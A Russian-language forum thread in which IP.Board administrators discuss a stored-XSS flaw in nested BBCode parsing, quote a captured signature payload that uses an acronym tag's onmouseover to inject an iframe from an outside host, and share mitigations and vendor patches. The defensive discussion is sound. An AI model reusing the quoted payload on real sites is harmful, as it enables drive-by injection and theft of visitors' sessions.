Перейти к контенту
  • 0

Пытаются взломать что делать


Вопрос

Есть форум ipb 2 3 6

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 100
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0
vasyast, ну, я, допустим, не школота, но на этом форуме есть активная XSS - это очень нехорошо и глупо это отрицать ;)

А я и не отрицаю. Да, дырка. Ну что ж поделать. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0

В общем, решение для тройки - отключите обработку вложенных тегов. Везде где только можно. Обязательно для email, url, font, member, topic, blog, post, acronym, background. Целее будете....

 

Надесь проснуться завтра и увидеть готовые патчи для 3.х и для 2.х :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
у меня на ни на 2,3,6 ни на 3,0,5 не работают эти скрипты... можете написать тут или в личку кинуть код красной таблички из первой страницы темы, хочу проверить у себя.
Ссылка на комментарий
Поделиться на других сайтах

  • 0

rinich, в настройках каждого из BBCode есть опция - "Предотвращать разбор вложенных кодов". Савьте "Да". Только кэш не сбрасывайте, а то уже существующие посты на форуме попортятся :D

 

Так, сводный пост по всему, что мне известно.

 

- дыра известна давно, еще с прошлого года.

- дыра есть и в 2.х, и в 3.х и связана с обработкой вложенных кодов,

- дыра явно активно эксплуатировалась всякими темными личностями и на публику попала случайно,

- в 2.х из-за дыры есть активная XSS (используется в подписях), что грозит вам уводом cookies, сиречь, сессии,

- в 3.х из-за дыры пока удается только попортить разметку страницы, однако, некоторые хакеры пишут о так же рабочей XSS,

- в 2.х проблема, вероятно, решается отключением BBCode в подписях и удалением тега acronym,

- в 3.х следует запретить обработку вложенных тегов для email, url, font, member, topic, blog, post, acronym, background. Возможно, другие теги так же уязвимы - не проверял.

 

Все примеры кода, ссылки на хакерские форумы и примеры использования эксплоитов высланы саппортам IPS и IBR.

 

В целом ничего хорошего.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Коды эксплоитов высланы на support@invisionpower.com и support@ibresource.ru.

Адреса support@ibresource.ru не существует. Если вы нашли этот адрес на одной из страниц клиентцентра, то это лишнее подтверждение того, что ИБР не в состоянии даже там привести всё к актуальному виду. Я говорил об этом ещё пар лет назад.

 

P.S. Напишите на sales@ibresource.ru, хотя уже всё равно.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Хотя бы лупбэк тогда отправляли бы, что нет адреса Оо

 

В клиент-центр запощу коды.

 

Собственно, запостил... Вот только 2:17 8-го марта дают неутешительные прогнозы на исправление.

 

Собственно, вот результат порчи IP.Board 3, уже затертый с IPS админами:

post-75890-1268003985_thumb.png

 

IPS отписались что рассматривают проблему.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Дыра в парсере BBCode.

 

- сменить себе пароль и сбросить ключ авторизации через админцентр;

- удалить BBCode acronym;

- отписать об обнаруженной уязвимости форума в IPS;

- начать думать об обновлении до 3.х (хотя там парсер еще кривее).

 

Первый пункт имеет смысл если сделать это быстро. Иначе вашей сессией уже могли воспользоваться (проверьте логи авторизации в АЦ) и что-нибудь нехорошее сделать.

 

Самый оптимальный вариант. Тэгом acronym мало кто пользуется...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
- удалить BBCode acronym;

Это все, что нужно сделать?

 

это спасет от тега акроним, на античате, хоть там и вобла, нашел тему где один пользователь описал как он взломал античат с помощью использования вложенных тегов url, так что как говорится закрыть можно только текущий баг, но не все лазейки

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо ;)

Я отрубил бб в подписе и в несколько тегах -- Использовать опции в теге? (Используется для создания BB-кода с опциями: [tag=option])

 

И все. Будут попытки вздома до патча, врублю все вновь, но отключу регистрацию на время. :D

 

Исправлено и для 2.3.6, и для 3.0.5. Патчи от IPS будут выложены сегодня.

Надо будет и здесь продублировать. А то ibresource выложить все с большой задержкой. :)

Ссылка на комментарий
Поделиться на других сайтах

  • 0

о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Обошел патч на 3.х (рабочую XSS не получил, но HTML снова разрушил). Снова отослал код. Что-то как-то экстенсивным путем идут ребята.... Изменено пользователем Ritsuka
Ссылка на комментарий
Поделиться на других сайтах

  • 0
о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

 

Я правильно понимаю что фиксанули только тег акроним , т.е. если он удален вообще то патч можно и не ставить? или там еще что-то?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Поправили только style. А вот onmouseover в подписи кажется и не тронули оО

 

Arhar, у меня нигде нет двойки и быстро не поставить :D

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.